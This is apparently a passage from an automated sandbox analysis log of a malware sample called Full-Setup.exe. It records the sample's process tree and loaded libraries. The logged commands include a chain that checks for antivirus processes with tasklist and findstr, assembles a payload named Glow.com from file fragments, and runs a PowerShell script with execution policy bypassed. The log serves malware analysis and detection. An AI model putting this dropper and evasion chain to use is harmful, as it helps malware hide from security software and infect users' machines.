        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention kJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com kJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"Jump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: Full-Setup.exeStatic file information: File size 1286284 > 1048576
        Source: Full-Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
        Source: Full-Setup.exeStatic PE information: real checksum: 0x13f1c7 should be: 0x147f8b
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003D0315 push cs; retn 003Ch10_2_003D0318
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A0DE6 push ecx; ret 10_2_003A0DF9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04800DB0 push edi; ret 15_2_04800DD2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_077131DF push FFFFFFE8h; retf 15_2_077131E1

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\600044\Glow.comJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\600044\Glow.comJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_004126DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_004126DD
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0039FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0039FC7C
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
